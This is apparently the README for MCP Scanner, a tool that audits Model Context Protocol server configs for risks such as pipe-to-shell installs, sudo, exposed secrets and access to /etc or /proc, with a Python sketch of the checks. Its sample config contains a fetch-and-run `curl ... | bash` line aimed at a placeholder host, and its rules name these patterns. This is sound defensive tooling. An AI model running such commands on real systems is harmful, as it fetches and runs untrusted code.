Security scanner for MCP (Model Context Protocol) servers. Detect malicious tools, data exfiltration, and supply chain risks before connecting an MCP server to your AI agent.
MCP servers give AI agents (Claude Code, Cursor, Copilot) direct access to tools, filesystems, and APIs. But nobody is checking if those servers are safe.
MCP Scanner analyzes:
- MCP server config files (Claude Code, Cursor, generic)
- Command-level risks (`npx --yes`, `curl|bash`, `sudo`)
- Secret exposure in environment variables
- Filesystem and network access patterns
- Source code of MCP server implementations (with AgentGuard integration)

```bash
pip install dfx-mcp-scanner

# Scan your Claude Code MCP config
mcp-scanner

# Scan a specific config
mcp-scanner ~/.cursor/mcp.json

# JSON output
mcp-scanner .mcp.json --format json
```

| Rule | Severity | Description |
|---|---|---|
| Remote code execution | CRITICAL | `curl \|` |
| Auto-install packages | HIGH | npx --yes without version pinning |
| Privileged execution | CRITICAL | Server running as root/sudo |
| Secret exposure | CRITICAL | Real API keys/tokens in config env vars |
| Host filesystem access | HIGH | Server accessing /etc, /root, /proc |
| External network access | MEDIUM | Server connecting to non-localhost URLs |
| Excessive tool count | LOW | Server registering >20 tools |

- Claude Code (`~/.claude/claude_code_config.json`)
- Cursor (`~/.cursor/mcp.json`)
- Project-level (`.mcp.json`)
- Generic MCP server configs
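
A sketch of the config-level checks listed in the rule table, as an added example rather than MCP Scanner's own code. It assumes the common `mcpServers` JSON layout; the regexes, function names and sample config are constructed for illustration.

```python
import json
import re

# Constructed sample using the widely used "mcpServers" layout (an assumption here).
SAMPLE = json.loads("""{"mcpServers": {
  "files":  {"command": "npx", "args": ["--yes", "example-fs-server", "/etc"]},
  "pinned": {"command": "npx", "args": ["--yes", "@example/server@1.2.3"]},
  "setup":  {"command": "bash", "args": ["-c", "curl https://example.invalid/i.sh | bash"]},
  "api":    {"command": "sudo", "args": ["example-api-server"],
             "env": {"API_TOKEN": "constructed-not-a-real-token", "REGION": "${REGION}"}}
}}""")

PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")
SENSITIVE_PATH = re.compile(r"^/(etc|root|proc)(/|$)")
SECRET_NAME = re.compile(r"KEY|TOKEN|SECRET|PASSWORD", re.I)
ENV_REFERENCE = re.compile(r"^\$\{?\w+\}?$")  # ${VAR} / $VAR, i.e. not a literal value
REMOTE_URL = re.compile(r"https?://(?!localhost\b|127\.0\.0\.1\b)", re.I)


def scan_server(name, spec):
    """Return (severity, server, message) findings for one server entry."""
    cmd, args, env = spec.get("command", ""), spec.get("args", []), spec.get("env", {})
    line = " ".join([cmd, *args])
    out = []
    if PIPE_TO_SHELL.search(line):
        out.append(("CRITICAL", name, "download piped to a shell"))
    if "sudo" in line.split():
        out.append(("CRITICAL", name, "runs under sudo"))
    if cmd == "npx" and {"--yes", "-y"} & set(args):
        pkg = next((a for a in args if not a.startswith("-")), "")
        if "@" not in pkg[1:]:  # pkg[1:] skips the leading "@" of a scoped name
            out.append(("HIGH", name, f"npx auto-install without version pin: {pkg}"))
    out += [("HIGH", name, f"host path access: {a}") for a in args if SENSITIVE_PATH.match(a)]
    for key, value in env.items():
        if SECRET_NAME.search(key) and value and not ENV_REFERENCE.match(str(value)):
            out.append(("CRITICAL", name, f"literal secret in env var {key}"))
    if any(REMOTE_URL.search(str(v)) for v in [line, *env.values()]):
        out.append(("MEDIUM", name, "non-localhost URL"))
    return out


def scan_config(config):
    """Scan every entry under "mcpServers" and return all findings."""
    servers = config.get("mcpServers", {})
    return [f for name, spec in servers.items() for f in scan_server(name, spec)]


if __name__ == "__main__":
    print(*scan_config(SAMPLE), sep="\n")
```

The pinned, scoped package and the `${REGION}` reference produce no findings, which shows the two cases a naive substring match on `npx --yes` or on env var names would misreport.
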
When AgentGuard is installed, MCP Scanner performs deep source code analysis on MCP server implementations using all 10 OWASP ASI detection rules.
MIT - see LICENSE.
Built by Dockfix Labs.